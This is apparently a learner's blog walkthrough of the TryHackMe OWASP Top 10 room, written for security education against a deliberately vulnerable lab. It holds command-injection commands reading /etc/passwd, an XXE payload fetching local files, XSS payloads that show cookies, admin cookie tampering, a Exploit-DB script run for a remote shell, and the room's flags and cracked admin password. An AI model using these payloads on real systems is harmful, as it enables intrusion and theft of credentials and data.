OWASP top10

This blog contains my walkthrough of the OWASP room in tryhackme while trying to learn more about cyber security. Check out the original room as well here.

Injection

Task 5: Command Injection Practical

What strange text file is in the website root directory?

Simply enter

ls

The console will display multiple file names, out of which the most probably answer is drpepper.txt

How many non-root/non-service/non-daemon users are there?

Enter

cat /etc/passwd 

This will list a bunch of users and other information. I will go over it one by one.

Firstly, the command is used to list the users that are locally stored in the system. The structure of each output is user_name:encrypter_password:user_ID:user_group_ID:full_name:user_home_directory:user_bash_shell

Now, a normal user has UID $\geq$ 1000. Hence all the other users are system users. As we can see, all the IDs mentioned are below 1000, hence we get the answer as 0 Read more about this here.

What user is the app running as?

Enter

whoami 

As can be seen, the answer is www-data

What is the user’s shell set as?

Again, enter

cat /etc/passwd

Now, you look at the user_bash_shell of www-data and we see that the answer is /usr/sbin/nologin

What version of Ubuntu is running?

Enter

hostnamectl

It will display a bunch of information about the OS the server is running on. Answer is 18.04.4

Print out the MOTD. What favorite beverage is shown?

Thew way I figured out the answer is simply by thinking that the name of strange text file was drpepper.txt. The name fit the answer so well :p

For a proper answer which I then googled for:

Enter

ls /etc/update-motd.d/
cat /etc/update-motd.d/00-header

The last line of the output talks about Dr Pepper hence that is the answer.

Broken Authentication

Task 7: Broken Authentication Practical

What is the flag you find in darren’s account?

Do as is mentioned, and once you log in you will see the flag fe86079416a21a3c99937fea8874b667

Now try to do the same trick and see if you can login as arthur

Yes, you can

What is the flag that you found in arthur’s account?

d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure

Task 11: Sensitive Data Exposure (Challenge)

What is the name of the mentioned directory

Since I thought they have mentioned the directory in the source code, I checked it but did not find anything in the main page. Then on going to the Log-In page I found /assets

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Go to http://MACHINE_IP/assets/. Here, we can see all the files and directories from which the answer is webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Download webapp.db. Then use the commands

sqlite3 webapp.db

Once that is done, use the following commands

> .tables
> pragma table_info(users);
> select * from users;

The answer is 6eea9b7ef19179a06954edd0f6c05ceb

Crack the hash.

Go to crackstation as mentioned in the material and crack the password. The answer is qwertyuiop

Log in as the admin, what is the flag?

Use the credentials you have, the answer is THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

XML External Entity

Task 13: eXtensible Markup Language

Full form of XML

Extensible Markup Language

is it compulsory to have XML prolog in XML documents?

no

Can we validate XML documents against a schema?

yes

How can we specify XML version and encoding in XML document?

XML prolog

Document Type Definition (DTD)

How do you define a new ELEMENT?

!ELEMENT

How do you define a ROOT element?

!DOCTYPE

How do you define a new ENTITY?

!ENTITY

Task 16: Exploiting

Try to display your own name using any payload.

Enter

<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
    <firstName>falcon</firstName>
    <lastName>&name;</lastName>
</userInfo>

See if you can read the /etc/passwd

Enter

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

What is the name of the user in /etc/passwd?

This can be determined by the output of the previous question. The answer is falcon

Where is falcon’s SSH key located?

This was fairly simple to do. It is known that ssh keys are stored in either .ssh/id_rsa or .ssh/id_rsa.pub based on whether you need public or private key. As the next question asks for private key, we get the answer as /home/falcon/.ssh/id_rsa

What are the first 18 characters for falcon’s private key?

Simple enough, just use the location mentioned in previous answers and cat the file. Answer is MIIEogIBAAKCAQEA7

Broken Access Control

Task 18: IDOR Challenge

Look at other users notes. What is the flag?

There are better methods to do thus (using Burpsuite) but since I did not know about it when I started this challenge, I just had to luck out by getting the answer at note=0

Security Misconfiguration

Task 19: Security Misconfiguration

Hack into the webapp, and find the flag!

So the first thing I did was go through the source code, but I couldnt find any comment of sorts there. Next, I thought to check it out in exploit db, but there too I did not get a good answer. I googled about then I found out that the answer was mentioned in its github page

Cross-site Scripting

Cross-site Scripting

Craft a reflected XSS payload that will cause a popup saying “Hello”

The answer is simple enough

<script>alert('Hello')</script>

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine’s IP address.

Google around the command to display your machines IP address in JS, after which enter

<script>alert(windows.location.host)</script>

Then add a comment and see if you can insert some of your own HTML

You can enter any HTML code you want.

<html>
    <body>
    <p> Hi </p>
    </body>
</html>

On the same page, create an alert popup box appear on the page with your document cookies.

Again, google around on how to display cookies in JS, then just write down the command:

<script>alert(document.cookies)</script>

Change “XSS Playground” to “I am a hacker” by adding a comment and using JS.

Go to the source code and figure out the document id of the element which has the title stored. Then use simple JS to change the heading (or use the hint :p)

    <script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

Insecure Deserialization

Task 21: Insecure Deserialization

Who developed the Tomcat application?

Google around, I initially got the answer as a single person who was responsible for it, but then you get The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialisation?

DOS, or Denial of Service

Task 25: Cookies Practical

1st flag (cookie value)

Follow the instructions mentioned in the text. The cookie value is base64 encoded, hence just use a normal base64 decoder to get the value of the cookies

2nd flag (admin dashboard)

Simply change the value of userType="admin".

Components with Known Vulnerabilities

Task 29: Lab

How many characters are in /etc/passwd

Go to exploit DB and see if you can find any exploits for CSE Bookstore or projectworld which will give us remote shell access. As we can see, there is one.

Now, we just download them and run the script to execute it. There is sufficient documentation to know how to execute the command

python3 47887.py http://machine_ip/
wc -c /etc/passwd

Insuffecient Logging and Monitoring

Task 30: Insuffecient Logging and Monitoring

What IP address is the attacker using?

Look at the IP adress which is used the most and is unauthorised. As can bee seen, the answer is 49.99.13.16

What kind of attack is being carried out?

From what can be seen, different usernames are used in each request. Also, using the hint, we can find out that the answer is Brute Force